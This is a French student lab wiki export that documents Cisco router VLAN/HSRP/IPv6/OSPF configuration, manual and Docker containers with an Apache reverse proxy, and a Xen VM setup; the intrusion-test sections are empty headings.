* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== 4 Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== 4.1 Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== 4.2 Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== 4.3 Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== 4.4 Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49111</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49111"/>
				<updated>2018-12-21T15:41:17Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Architecture réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
